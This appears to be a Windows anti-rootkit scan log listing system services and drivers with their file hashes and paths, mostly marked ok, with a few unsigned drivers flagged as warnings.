00:53:05.0514 4376	aic78xx (ae1fdf7bf7bb6c6a70f67699d880592a) C:\Windows\system32\drivers\djsvs.sys
00:53:05.0529 4376	aic78xx - ok
00:53:05.0717 4376	ALG (a1545b731579895d8cc44fc0481c1192) C:\Windows\System32\alg.exe
00:53:05.0857 4376	ALG - ok
00:53:05.0888 4376	aliide (90395b64600ebb4552e26e178c94b2e4) C:\Windows\system32\drivers\aliide.sys
00:53:05.0904 4376	aliide - ok
00:53:05.0935 4376	amdagp (2b13e304c9dfdfa5eb582f6a149fa2c7) C:\Windows\system32\drivers\amdagp.sys
00:53:05.0951 4376	amdagp - ok
00:53:05.0982 4376	amdide (0577df1d323fe75a739c787893d300ea) C:\Windows\system32\drivers\amdide.sys
00:53:05.0997 4376	amdide - ok
00:53:06.0044 4376	AmdK7 (dc487885bcef9f28eece6fac0e5ddfc5) C:\Windows\system32\drivers\amdk7.sys
00:53:06.0278 4376	AmdK7 - ok
00:53:06.0497 4376	AmdK8 (93ae7f7dd54ab986a6f1a1b37be7442d) C:\Windows\system32\DRIVERS\amdk8.sys
00:53:06.0528 4376	AmdK8 - ok
00:53:06.0590 4376	ApfiltrService (7c2f57bce81fa74933f0e1c84a97c9db) C:\Windows\system32\DRIVERS\Apfiltr.sys
00:53:06.0621 4376	ApfiltrService - ok
00:53:07.0058 4376	AppHostSvc (dfae18c675d71fd06d57dc69d2913975) C:\Windows\system32\inetsrv\apphostsvc.dll
00:53:07.0121 4376	AppHostSvc - ok
00:53:07.0214 4376	Appinfo (c6d704c7f0434dc791aac37cac4b6e14) C:\Windows\System32\appinfo.dll
00:53:07.0230 4376	Appinfo - ok
00:53:07.0433 4376	Apple Mobile Device (7ef47644b74ebe721cc32211d3c35e76) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
00:53:07.0464 4376	Apple Mobile Device - ok
00:53:07.0698 4376	arc (5f673180268bb1fdb69c99b6619fe379) C:\Windows\system32\drivers\arc.sys
00:53:07.0713 4376	arc - ok
00:53:07.0760 4376	arcsas (957f7540b5e7f602e44648c7de5a1c05) C:\Windows\system32\drivers\arcsas.sys
00:53:07.0776 4376	arcsas - ok
00:53:07.0854 4376	AsyncMac (53b202abee6455406254444303e87be1) C:\Windows\system32\DRIVERS\asyncmac.sys
00:53:07.0885 4376	AsyncMac - ok
00:53:07.0947 4376	atapi (1f05b78ab91c9075565a9d8a4b880bc4) C:\Windows\system32\drivers\atapi.sys
00:53:07.0963 4376	atapi - ok
00:53:08.0150 4376	athr (8be56f8300e1c37b578da23c71816b7a) C:\Windows\system32\DRIVERS\athr.sys
00:53:08.0275 4376	athr - ok
00:53:08.0431 4376	Ati External Event Utility (59991b5ec50e106634a16444594c305e) C:\Windows\system32\Ati2evxx.exe
00:53:08.0493 4376	Ati External Event Utility - ok
00:53:09.0180 4376	atikmdag (fab37c8e4b55235de9055026561dcc7f) C:\Windows\system32\DRIVERS\atikmdag.sys
00:53:09.0258 4376	atikmdag - ok
00:53:09.0695 4376	AudioEndpointBuilder (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
00:53:09.0726 4376	AudioEndpointBuilder - ok
00:53:09.0741 4376	Audiosrv (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
00:53:09.0773 4376	Audiosrv - ok
00:53:09.0819 4376	axsaki - ok
00:53:09.0882 4376	Beep (67e506b75bd5326a3ec7b70bd014dfb6) C:\Windows\system32\drivers\Beep.sys
00:53:09.0913 4376	Beep - ok
00:53:10.0085 4376	BFE (c789af0f724fda5852fb9a7d3a432381) C:\Windows\System32\bfe.dll
00:53:10.0116 4376	BFE - ok
00:53:10.0412 4376	BITS (93952506c6d67330367f7e7934b6a02f) C:\Windows\system32\qmgr.dll
00:53:10.0490 4376	BITS - ok
00:53:10.0506 4376	blbdrive - ok
00:53:10.0880 4376	Bonjour Service (db5bea73edaf19ac68b2c0fad0f92b1a) C:\Program Files\Bonjour\mDNSResponder.exe
00:53:10.0896 4376	Bonjour Service - ok
00:53:11.0005 4376	bowser (35f376253f687bde63976ccb3f2108ca) C:\Windows\system32\DRIVERS\bowser.sys
00:53:11.0036 4376	bowser - ok
00:53:11.0083 4376	BrFiltLo (9f9acc7f7ccde8a15c282d3f88b43309) C:\Windows\system32\drivers\brfiltlo.sys
00:53:11.0114 4376	BrFiltLo - ok
00:53:11.0177 4376	BrFiltUp (56801ad62213a41f6497f96dee83755a) C:\Windows\system32\drivers\brfiltup.sys
00:53:11.0208 4376	BrFiltUp - ok
00:53:11.0379 4376	Browser (a3629a0c4226f9e9c72faaeebc3ad33c) C:\Windows\System32\browser.dll
00:53:11.0411 4376	Browser - ok
00:53:11.0442 4376	Brserid (b304e75cff293029eddf094246747113) C:\Windows\system32\drivers\brserid.sys
00:53:11.0504 4376	Brserid - ok
00:53:11.0535 4376	BrSerWdm (203f0b1e73adadbbb7b7b1fabd901f6b) C:\Windows\system32\drivers\brserwdm.sys
00:53:11.0598 4376	BrSerWdm - ok
00:53:11.0707 4376	BrUsbMdm (bd456606156ba17e60a04e18016ae54b) C:\Windows\system32\drivers\brusbmdm.sys
00:53:11.0754 4376	BrUsbMdm - ok
00:53:11.0785 4376	BrUsbSer (af72ed54503f717a43268b3cc5faec2e) C:\Windows\system32\drivers\brusbser.sys
00:53:11.0863 4376	BrUsbSer - ok
00:53:12.0144 4376	BTHMODEM (ad07c1ec6665b8b35741ab91200c6b68) C:\Windows\system32\drivers\bthmodem.sys
00:53:12.0222 4376	BTHMODEM - ok
00:53:12.0347 4376	BVRPMPR5 (248dfa5762dde38dfddbbd44149e9d7a) C:\Windows\system32\drivers\BVRPMPR5.SYS
00:53:12.0362 4376	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - warning
00:53:12.0362 4376	BVRPMPR5 - detected UnsignedFile.Multi.Generic (1)
00:53:12.0409 4376	catchme - ok
00:53:12.0534 4376	cdfs (7add03e75beb9e6dd102c3081d29840a) C:\Windows\system32\DRIVERS\cdfs.sys
00:53:12.0565 4376	cdfs - ok
00:53:12.0674 4376	cdrom (6b4bffb9becd728097024276430db314) C:\Windows\system32\DRIVERS\cdrom.sys
00:53:12.0721 4376	cdrom - ok
00:53:12.0861 4376	CertPropSvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
00:53:12.0877 4376	CertPropSvc - ok
00:53:13.0002 4376	circlass (da8e0afc7baa226c538ef53ac2f90897) C:\Windows\system32\drivers\circlass.sys
00:53:13.0064 4376	circlass - ok
00:53:13.0173 4376	CLFS (d7659d3b5b92c31e84e53c1431f35132) C:\Windows\system32\CLFS.sys
00:53:13.0205 4376	CLFS - ok
00:53:13.0485 4376	clr_optimization_v2.0.50727_32 (8ee772032e2fe80a924f3b8dd5082194) C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
00:53:13.0501 4376	clr_optimization_v2.0.50727_32 - ok
00:53:13.0673 4376	clr_optimization_v4.0.30319_32 (c5a75eb48e2344abdc162bda79e16841) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
00:53:13.0688 4376	clr_optimization_v4.0.30319_32 - ok
00:53:13.0782 4376	CmBatt (99afc3795b58cc478fbbbcdc658fcb56) C:\Windows\system32\DRIVERS\CmBatt.sys
00:53:13.0813 4376	CmBatt - ok
00:53:13.0891 4376	cmdide (45201046c776ffdaf3fc8a0029c581c8) C:\Windows\system32\drivers\cmdide.sys
00:53:13.0907 4376	cmdide - ok
00:53:14.0109 4376	Compbatt (6afef0b60fa25de07c0968983ee4f60a) C:\Windows\system32\DRIVERS\compbatt.sys
00:53:14.0172 4376	Compbatt - ok
00:53:14.0172 4376	COMSysApp - ok
00:53:14.0375 4376	crcdisk (2a213ae086bbec5e937553c7d9a2b22c) C:\Windows\system32\drivers\crcdisk.sys
00:53:14.0375 4376	crcdisk - ok
00:53:14.0702 4376	Crusoe (22a7f883508176489f559ee745b5bf5d) C:\Windows\system32\drivers\crusoe.sys
00:53:14.0749 4376	Crusoe - ok
00:53:14.0827 4376	CryptSvc (fb27772beaf8e1d28ccd825c09da939b) C:\Windows\system32\cryptsvc.dll
00:53:14.0858 4376	CryptSvc - ok
00:53:15.0045 4376	DcomLaunch (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
00:53:15.0201 4376	DcomLaunch - ok
00:53:15.0435 4376	DfsC (622c41a07ca7e6dd91770f50d532cb6c) C:\Windows\system32\Drivers\dfsc.sys
00:53:15.0482 4376	DfsC - ok
00:53:16.0356 4376	DFSR (2cc3dcfb533a1035b13dcab6160ab38b) C:\Windows\system32\DFSR.exe
00:53:16.0512 4376	DFSR - ok
00:53:16.0824 4376	Dhcp (9028559c132146fb75eb7acf384b086a) C:\Windows\System32\dhcpcsvc.dll
00:53:16.0855 4376	Dhcp - ok
00:53:16.0964 4376	disk (5d4aefc3386920236a548271f8f1af6a) C:\Windows\system32\drivers\disk.sys
00:53:16.0980 4376	disk - ok
00:53:17.0276 4376	dldtCATSCustConnectService (31b7596edd9505fcbb07670fb69cbb48) C:\Windows\system32\spool\DRIVERS\W32X86\3\\dldtserv.exe
00:53:17.0292 4376	dldtCATSCustConnectService - ok
00:53:17.0307 4376	dldt_device - ok
00:53:17.0619 4376	Dnscache (57d762f6f5974af0da2be88a3349baaa) C:\Windows\System32\dnsrslvr.dll
00:53:17.0651 4376	Dnscache - ok
00:53:17.0775 4376	dot3svc (324fd74686b1ef5e7c19a8af49e748f6) C:\Windows\System32\dot3svc.dll
00:53:17.0807 4376	dot3svc - ok
00:53:17.0885 4376	DPS (a622e888f8aa2f6b49e9bc466f0e5def) C:\Windows\system32\dps.dll
00:53:17.0916 4376	DPS - ok
00:53:18.0025 4376	drmkaud (97fef831ab90bee128c9af390e243f80) C:\Windows\system32\drivers\drmkaud.sys
00:53:18.0056 4376	drmkaud - ok
00:53:18.0181 4376	DXGKrnl (c68ac676b0ef30cfbb1080adce49eb1f) C:\Windows\System32\drivers\dxgkrnl.sys
00:53:18.0243 4376	DXGKrnl - ok
00:53:18.0306 4376	E1G60 (f88fb26547fd2ce6d0a5af2985892c48) C:\Windows\system32\DRIVERS\E1G60I32.sys
00:53:18.0353 4376	E1G60 - ok
00:53:18.0493 4376	EapHost (c0b95e40d85cd807d614e264248a45b9) C:\Windows\System32\eapsvc.dll
00:53:18.0524 4376	EapHost - ok
00:53:18.0805 4376	Ecache (7f64ea048dcfac7acf8b4d7b4e6fe371) C:\Windows\system32\drivers\ecache.sys
00:53:18.0821 4376	Ecache - ok
00:53:19.0008 4376	ehRecvr (9be3744d295a7701eb425332014f0797) C:\Windows\ehome\ehRecvr.exe
00:53:19.0164 4376	ehRecvr - ok
00:53:19.0460 4376	ehSched (ad1870c8e5d6dd340c829e6074bf3c3f) C:\Windows\ehome\ehsched.exe
00:53:19.0554 4376	ehSched - ok
00:53:19.0585 4376	ehstart (c27c4ee8926e74aa72efcab24c5242c3) C:\Windows\ehome\ehstart.dll
00:53:19.0616 4376	ehstart - ok
00:53:19.0679 4376	ElbyCDIO (aaa8999a169e39fb8b48ae49cd6ac30a) C:\Windows\system32\Drivers\ElbyCDIO.sys
00:53:19.0710 4376	ElbyCDIO - ok
00:53:19.0788 4376	ElbyDelay (e205c313417da6fa7afe85912a310a65) C:\Windows\system32\Drivers\ElbyDelay.sys
00:53:19.0788 4376	ElbyDelay - ok
00:53:19.0881 4376	elxstor (e8f3f21a71720c84bcf423b80028359f) C:\Windows\system32\drivers\elxstor.sys
00:53:19.0913 4376	elxstor - ok
00:53:20.0069 4376	EMDMgmt (4e6b23dfc917ea39306b529b773950f4) C:\Windows\system32\emdmgmt.dll
00:53:20.0147 4376	EMDMgmt - ok
00:53:20.0256 4376	EventSystem (67058c46504bc12d821f38cf99b7b28f) C:\Windows\system32\es.dll
00:53:20.0287 4376	EventSystem - ok
00:53:20.0412 4376	exfat (22b408651f9123527bcee54b4f6c5cae) C:\Windows\system32\drivers\exfat.sys
00:53:20.0459 4376	exfat - ok
00:53:20.0568 4376	fastfat (1e9b9a70d332103c52995e957dc09ef8) C:\Windows\system32\drivers\fastfat.sys
00:53:20.0599 4376	fastfat - ok
00:53:20.0646 4376	fdc (63bdada84951b9c03e641800e176898a) C:\Windows\system32\DRIVERS\fdc.sys
00:53:20.0708 4376	fdc - ok
00:53:20.0739 4376	fdPHost (6629b5f0e98151f4afdd87567ea32ba3) C:\Windows\system32\fdPHost.dll
00:53:20.0771 4376	fdPHost - ok
00:53:20.0880 4376	FDResPub (89ed56dce8e47af40892778a5bd31fd2) C:\Windows\system32\fdrespub.dll
00:53:20.0927 4376	FDResPub - ok
00:53:21.0067 4376	FileInfo (a8c0139a884861e3aae9cfe73b208a9f) C:\Windows\system32\drivers\fileinfo.sys
00:53:21.0083 4376	FileInfo - ok
00:53:21.0114 4376	Filetrace (0ae429a696aecbc5970e3cf2c62635ae) C:\Windows\system32\drivers\filetrace.sys
00:53:21.0145 4376	Filetrace - ok
00:53:21.0207 4376	flpydisk (6603957eff5ec62d25075ea8ac27de68) C:\Windows\system32\DRIVERS\flpydisk.sys
00:53:21.0270 4376	flpydisk - ok
00:53:21.0379 4376	FltMgr (01334f9ea68e6877c4ef05d3ea8abb05) C:\Windows\system32\drivers\fltmgr.sys
00:53:21.0395 4376	FltMgr - ok
00:53:21.0675 4376	FontCache (8ce364388c8eca59b14b539179276d44) C:\Windows\system32\FntCache.dll
00:53:21.0753 4376	FontCache - ok
00:53:22.0019 4376	FontCache3.0.0.0 (c7fbdd1ed42f82bfa35167a5c9803ea3) C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
00:53:22.0034 4376	FontCache3.0.0.0 - ok
00:53:22.0143 4376	Fs_Rec (b972a66758577e0bfd1de0f91aaa27b5) C:\Windows\system32\drivers\Fs_Rec.sys
00:53:22.0175 4376	Fs_Rec - ok
00:53:22.0206 4376	gagp30kx (4e1cd0a45c50a8882616cae5bf82f3c5) C:\Windows\system32\drivers\gagp30kx.sys
00:53:22.0221 4376	gagp30kx - ok
00:53:22.0362 4376	GEARAspiWDM (8182ff89c65e4d38b2de4bb0fb18564e) C:\Windows\system32\Drivers\GEARAspiWDM.sys
00:53:22.0362 4376	GEARAspiWDM - ok
00:53:22.0549 4376	Giraffic - ok
00:53:22.0783 4376	gpsvc (cd5d0aeee35dfd4e986a5aa1500a6e66) C:\Windows\System32\gpsvc.dll
00:53:22.0845 4376	gpsvc - ok
00:53:22.0923 4376	gusvc (751c1d2ca2abf4a9f5a6b8d7d45b907c) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
00:53:22.0939 4376	gusvc - ok
00:53:23.0079 4376	HdAudAddService (cb04c744be0a61b1d648faed182c3b59) C:\Windows\system32\drivers\HdAudio.sys
00:53:23.0142 4376	HdAudAddService - ok
00:53:23.0267 4376	HDAudBus (062452b7ffd68c8c042a6261fe8dff4a) C:\Windows\system32\DRIVERS\HDAudBus.sys
00:53:23.0329 4376	HDAudBus - ok
00:53:23.0360 4376	HidBth (1338520e78d90154ed6be8f84de5fceb) C:\Windows\system32\drivers\hidbth.sys
00:53:23.0407 4376	HidBth - ok
00:53:23.0454 4376	HidIr (ff3160c3a2445128c5a6d9b076da519e) C:\Windows\system32\drivers\hidir.sys
00:53:23.0516 4376	HidIr - ok
00:53:23.0594 4376	hidserv (84067081f3318162797385e11a8f0582) C:\Windows\System32\hidserv.dll
00:53:23.0610 4376	hidserv - ok
00:53:23.0719 4376	HidUsb (cca4b519b17e23a00b826c55716809cc) C:\Windows\system32\DRIVERS\hidusb.sys
00:53:23.0735 4376	HidUsb - ok
00:53:23.0891 4376	hkmsvc (d8ad255b37da92434c26e4876db7d418) C:\Windows\system32\kmsvc.dll
00:53:23.0922 4376	hkmsvc - ok
00:53:24.0047 4376	HpCISSs (df353b401001246853763c4b7aaa6f50) C:\Windows\system32\drivers\hpcisss.sys
00:53:24.0062 4376	HpCISSs - ok
00:53:24.0203 4376	HTTP (f870aa3e254628ebeafe754108d664de) C:\Windows\system32\drivers\HTTP.sys
00:53:24.0265 4376	HTTP - ok
00:53:24.0343 4376	i2omp (324c2152ff2c61abae92d09f3cca4d63) C:\Windows\system32\drivers\i2omp.sys
00:53:24.0359 4376	i2omp - ok
00:53:24.0593 4376	i8042prt (22d56c8184586b7a1f6fa60be5f5a2bd) C:\Windows\system32\DRIVERS\i8042prt.sys
00:53:24.0608 4376	i8042prt - ok
00:53:24.0733 4376	iaStorV (c957bf4b5d80b46c5017bf0101e6c906) C:\Windows\system32\drivers\iastorv.sys
00:53:24.0749 4376	iaStorV - ok
00:53:25.0482 4376	IDriverT (6f95324909b502e2651442c1548ab12f) C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
00:53:25.0513 4376	IDriverT ( UnsignedFile.Multi.Generic ) - warning
00:53:25.0513 4376	IDriverT - detected UnsignedFile.Multi.Generic (1)
00:53:26.0605 4376	idsvc (98477b08e61945f974ed9fdc4cb6bdab) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
00:53:26.0652 4376	idsvc - ok
00:53:26.0995 4376	iirsp (2d077bf86e843f901d8db709c95b49a5) C:\Windows\system32\drivers\iirsp.sys
00:53:27.0011 4376	iirsp - ok
00:53:27.0151 4376	IKEEXT (9908d8a397b76cd8d31d0d383c5773c9) C:\Windows\System32\ikeext.dll
00:53:27.0198 4376	IKEEXT - ok
00:53:27.0416 4376	IntcAzAudAddService (7bd4e0428776d11c8e8e26f9f5508690) C:\Windows\system32\drivers\RTKVHDA.sys
00:53:27.0744 4376	IntcAzAudAddService - ok
00:53:28.0071 4376	intelide (97469037714070e45194ed318d636401) C:\Windows\system32\drivers\intelide.sys
00:53:28.0103 4376	intelide - ok
00:53:28.0134 4376	intelppm (ce44cc04262f28216dd4341e9e36a16f) C:\Windows\system32\DRIVERS\intelppm.sys
00:53:28.0196 4376	intelppm - ok
00:53:28.0274 4376	IPBusEnum (9ac218c6e6105477484c6fdbe7d409a4) C:\Windows\system32\ipbusenum.dll
00:53:28.0305 4376	IPBusEnum - ok
00:53:28.0430 4376	IpFilterDriver (62c265c38769b864cb25b4bcf62df6c3) C:\Windows\system32\DRIVERS\ipfltdrv.sys
00:53:28.0461 4376	IpFilterDriver - ok
00:53:28.0586 4376	iphlpsvc (1998bd97f950680bb55f55a7244679c2) C:\Windows\System32\iphlpsvc.dll
00:53:28.0633 4376	iphlpsvc - ok
00:53:28.0649 4376	IpInIp - ok
00:53:28.0680 4376	IPMIDRV (40f34f8aba2a015d780e4b09138b6c17) C:\Windows\system32\drivers\ipmidrv.sys
00:53:28.0742 4376	IPMIDRV - ok
00:53:28.0805 4376	IPNAT (8793643a67b42cec66490b2a0cf92d68) C:\Windows\system32\DRIVERS\ipnat.sys
00:53:28.0836 4376	IPNAT - ok
00:53:29.0039 4376	iPod Service (57edb35ea2feca88f8b17c0c095c9a56) C:\Program Files\iPod\bin\iPodService.exe
00:53:29.0101 4376	iPod Service - ok
00:53:29.0210 4376	IRENUM (109c0dfb82c3632fbd11949b73aeeac9) C:\Windows\system32\drivers\irenum.sys
00:53:29.0273 4376	IRENUM - ok
00:53:29.0475 4376	isapnp (350fca7e73cf65bcef43fae1e4e91293) C:\Windows\system32\drivers\isapnp.sys
00:53:29.0491 4376	isapnp - ok
00:53:29.0616 4376	iScsiPrt (232fa340531d940aac623b121a595034) C:\Windows\system32\DRIVERS\msiscsi.sys
00:53:29.0631 4376	iScsiPrt - ok
00:53:29.0663 4376	iteatapi (bced60d16156e428f8df8cf27b0df150) C:\Windows\system32\drivers\iteatapi.sys
00:53:29.0678 4376	iteatapi - ok
00:53:29.0725 4376	iteraid (06fa654504a498c30adca8bec4e87e7e) C:\Windows\system32\drivers\iteraid.sys
00:53:29.0741 4376	iteraid - ok
00:53:29.0803 4376	kbdclass (37605e0a8cf00cbba538e753e4344c6e) C:\Windows\system32\DRIVERS\kbdclass.sys
00:53:29.0819 4376	kbdclass - ok
00:53:29.0975 4376	kbdhid (ede59ec70e25c24581add1fbec7325f7) C:\Windows\system32\DRIVERS\kbdhid.sys
00:53:30.0006 4376	kbdhid - ok
00:53:30.0068 4376	KeyIso (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
00:53:30.0115 4376	KeyIso - ok
00:53:30.0193 4376	KR10I (1e0d65f7ffeb4e99b2eec1ccb5754cc8) C:\Windows\system32\drivers\kr10i.sys
00:53:30.0287 4376	KR10I ( UnsignedFile.Multi.Generic ) - warning
00:53:30.0287 4376	KR10I - detected UnsignedFile.Multi.Generic (1)
00:53:30.0333 4376	KR10N (a1963360e74931222a67356c8ad48378) C:\Windows\system32\drivers\kr10n.sys
00:53:30.0411 4376	KR10N ( UnsignedFile.Multi.Generic ) - warning
00:53:30.0411 4376	KR10N - detected UnsignedFile.Multi.Generic (1)
00:53:30.0474 4376	KR3NPXP (485e005cd51ff502fb16483eb4b69c17) C:\Windows\system32\drivers\kr3npxp.sys
00:53:30.0661 4376	KR3NPXP ( UnsignedFile.Multi.Generic ) - warning
00:53:30.0661 4376	KR3NPXP - detected UnsignedFile.Multi.Generic (1)
00:53:30.0801 4376	KSecDD (2b2f1638466e8cb091400c9019cc730e) C:\Windows\system32\Drivers\ksecdd.sys
00:53:30.0833 4376	KSecDD - ok
00:53:31.0035 4376	KtmRm (8078f8f8f7a79e2e6b494523a828c585) C:\Windows\system32\msdtckrm.dll
00:53:31.0098 4376	KtmRm - ok
00:53:31.0254 4376	LanmanServer (1bf5eebfd518dd7298434d8c862f825d) C:\Windows\System32\srvsvc.dll
00:53:31.0285 4376	LanmanServer - ok
00:53:31.0441 4376	LanmanWorkstation (1db69705b695b987082c8baec0c6b34f) C:\Windows\System32\wkssvc.dll
00:53:31.0472 4376	LanmanWorkstation - ok
00:53:31.0597 4376	lltdio (d1c5883087a0c3f1344d9d55a44901f6) C:\Windows\system32\DRIVERS\lltdio.sys
00:53:31.0628 4376	lltdio - ok
00:53:31.0784 4376	lltdsvc (2d5a428872f1442631d0959a34abff63) C:\Windows\System32\lltdsvc.dll
00:53:31.0815 4376	lltdsvc - ok
00:53:32.0049 4376	lmhosts (35d40113e4a5b961b6ce5c5857702518) C:\Windows\System32\lmhsvc.dll
00:53:32.0096 4376	lmhosts - ok
00:53:32.0143 4376	LPCFilter (515fc18cabee0158a324b08b1c2667cf) C:\Windows\system32\DRIVERS\LPCFilter.sys
00:53:32.0174 4376	LPCFilter - ok
00:53:32.0346 4376	LSI_FC (a2262fb9f28935e862b4db46438c80d2) C:\Windows\system32\drivers\lsi_fc.sys
00:53:32.0361 4376	LSI_FC - ok
00:53:32.0393 4376	LSI_SAS (30d73327d390f72a62f32c103daf1d6d) C:\Windows\system32\drivers\lsi_sas.sys
00:53:32.0408 4376	LSI_SAS - ok
00:53:32.0580 4376	LSI_SCSI (e1e36fefd45849a95f1ab81de0159fe3) C:\Windows\system32\drivers\lsi_scsi.sys
00:53:32.0595 4376	LSI_SCSI - ok
00:53:32.0705 4376	luafv (8f5c7426567798e62a3b3614965d62cc) C:\Windows\system32\drivers\luafv.sys
00:53:32.0736 4376	luafv - ok
00:53:32.0970 4376	McAfee SiteAdvisor Service (6c3d154fff0a97a6c3d9f78d60c41655) c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
00:53:32.0985 4376	McAfee SiteAdvisor Service - ok
00:53:33.0095 4376	Mcx2Svc (aef9babb8a506bc4ce0451a64aaded46) C:\Windows\system32\Mcx2Svc.dll
00:53:33.0110 4376	Mcx2Svc - ok
00:53:33.0282 4376	MDM (11f714f85530a2bd134074dc30e99fca) C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
00:53:33.0297 4376	MDM - ok
00:53:33.0360 4376	megasas (d153b14fc6598eae8422a2037553adce) C:\Windows\system32\drivers\megasas.sys
00:53:33.0375 4376	megasas - ok
00:53:33.0469 4376	MMCSS (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
00:53:33.0500 4376	MMCSS - ok
00:53:33.0594 4376	Modem (e13b5ea0f51ba5b1512ec671393d09ba) C:\Windows\system32\drivers\modem.sys
00:53:33.0656 4376	Modem - ok
00:53:33.0828 4376	monitor (0a9bb33b56e294f686abb7c1e4e2d8a8) C:\Windows\system32\DRIVERS\monitor.sys
00:53:33.0859 4376	monitor - ok
00:53:33.0953 4376	mouclass (5bf6a1326a335c5298477754a506d263) C:\Windows\system32\DRIVERS\mouclass.sys
00:53:33.0968 4376	mouclass - ok
00:53:33.0984 4376	mouhid (93b8d4869e12cfbe663915502900876f) C:\Windows\system32\DRIVERS\mouhid.sys
00:53:34.0015 4376	mouhid - ok
00:53:34.0062 4376	MountMgr (bdafc88aa6b92f7842416ea6a48e1600) C:\Windows\system32\drivers\mountmgr.sys
00:53:34.0077 4376	MountMgr - ok
00:53:34.0202 4376	MpFilter (d993bea500e7382dc4e760bf4f35efcb) C:\Windows\system32\DRIVERS\MpFilter.sys
00:53:34.0218 4376	MpFilter - ok
00:53:34.0265 4376	mpio (583a41f26278d9e0ea548163d6139397) C:\Windows\system32\drivers\mpio.sys
00:53:34.0280 4376	mpio - ok
00:53:34.0530 4376	MpKsl969ad15c (a69630d039c38018689190234f866d77) c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{50C28A22-B3EC-472C-BB7F-F841BF47E300}\MpKsl969ad15c.sys
00:53:34.0545 4376	MpKsl969ad15c - ok
00:53:34.0639 4376	mpsdrv (22241feba9b2defa669c8cb0a8dd7d2e) C:\Windows\system32\drivers\mpsdrv.sys
00:53:34.0670 4376	mpsdrv - ok
00:53:34.0779 4376	MpsSvc (5de62c6e9108f14f6794060a9bdecaec) C:\Windows\system32\mpssvc.dll
00:53:34.0842 4376	MpsSvc - ok
00:53:34.0935 4376	Mraid35x (4fbbb70d30fd20ec51f80061703b001e) C:\Windows\system32\drivers\mraid35x.sys
00:53:34.0951 4376	Mraid35x - ok
00:53:35.0060 4376	MRxDAV (82cea0395524aacfeb58ba1448e8325c) C:\Windows\system32\drivers\mrxdav.sys
00:53:35.0076 4376	MRxDAV - ok
00:53:35.0169 4376	mrxsmb (1e94971c4b446ab2290deb71d01cf0c2) C:\Windows\system32\DRIVERS\mrxsmb.sys
00:53:35.0201 4376	mrxsmb - ok
00:53:35.0325 4376	mrxsmb10 (4fccb34d793b116423209c0f8b7a3b03) C:\Windows\system32\DRIVERS\mrxsmb10.sys
00:53:35.0341 4376	mrxsmb10 - ok
00:53:35.0357 4376	mrxsmb20 (c3cb1b40ad4a0124d617a1199b0b9d7c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
00:53:35.0372 4376	mrxsmb20 - ok
00:53:35.0419 4376	msahci (742aed7939e734c36b7e8d6228ce26b7) C:\Windows\system32\drivers\msahci.sys
00:53:35.0435 4376	msahci - ok
00:53:35.0450 4376	msdsm (3fc82a2ae4cc149165a94699183d3028) C:\Windows\system32\drivers\msdsm.sys
00:53:35.0466 4376	msdsm - ok
00:53:35.0544 4376	MSDTC (fd7520cc3a80c5fc8c48852bb24c6ded) C:\Windows\System32\msdtc.exe
00:53:35.0575 4376	MSDTC - ok
00:53:35.0747 4376	Msfs (a9927f4a46b816c92f461acb90cf8515) C:\Windows\system32\drivers\Msfs.sys
00:53:35.0809 4376	Msfs - ok
00:53:35.0981 4376	msisadrv (0f400e306f385c56317357d6dea56f62) C:\Windows\system32\drivers\msisadrv.sys
00:53:35.0996 4376	msisadrv - ok
00:53:36.0215 4376	MSiSCSI (85466c0757a23d9a9aecdc0755203cb2) C:\Windows\system32\iscsiexe.dll
00:53:36.0246 4376	MSiSCSI - ok
00:53:36.0261 4376	msiserver - ok
00:53:36.0324 4376	MSKSSRV (d8c63d34d9c9e56c059e24ec7185cc07) C:\Windows\system32\drivers\MSKSSRV.sys
00:53:36.0355 4376	MSKSSRV - ok
00:53:36.0527 4376	MsMpSvc (24516bf4e12a46cb67302e2cdcb8cddf) c:\Program Files\Microsoft Security Client\MsMpEng.exe
00:53:36.0542 4376	MsMpSvc - ok
00:53:36.0573 4376	MSPCLOCK (1d373c90d62ddb641d50e55b9e78d65e) C:\Windows\system32\drivers\MSPCLOCK.sys
00:53:36.0605 4376	MSPCLOCK - ok
00:53:36.0620 4376	MSPQM (b572da05bf4e098d4bba3a4734fb505b) C:\Windows\system32\drivers\MSPQM.sys
00:53:36.0651 4376	MSPQM - ok
00:53:36.0745 4376	MsRPC (b49456d70555de905c311bcda6ec6adb) C:\Windows\system32\drivers\MsRPC.sys
00:53:36.0776 4376	MsRPC - ok
00:53:36.0901 4376	mssmbios (e384487cb84be41d09711c30ca79646c) C:\Windows\system32\DRIVERS\mssmbios.sys
00:53:36.0917 4376	mssmbios - ok
00:53:36.0963 4376	MSTEE (7199c1eec1e4993caf96b8c0a26bd58a) C:\Windows\system32\drivers\MSTEE.sys
00:53:36.0995 4376	MSTEE - ok
00:53:37.0088 4376	Mup (6a57b5733d4cb702c8ea4542e836b96c) C:\Windows\system32\Drivers\mup.sys
00:53:37.0119 4376	Mup - ok
00:53:37.0291 4376	napagent (e4eaf0c5c1b41b5c83386cf212ca9584) C:\Windows\system32\qagentRT.dll
00:53:37.0353 4376	napagent - ok
00:53:37.0431 4376	NativeWifiP (85c44fdff9cf7e72a40dcb7ec06a4416) C:\Windows\system32\DRIVERS\nwifi.sys
00:53:37.0447 4376	NativeWifiP - ok
00:53:37.0509 4376	NCHSSVAD (0df9cc7b5cc173f545723f23e68fac93) C:\Windows\system32\drivers\nchssvad.sys
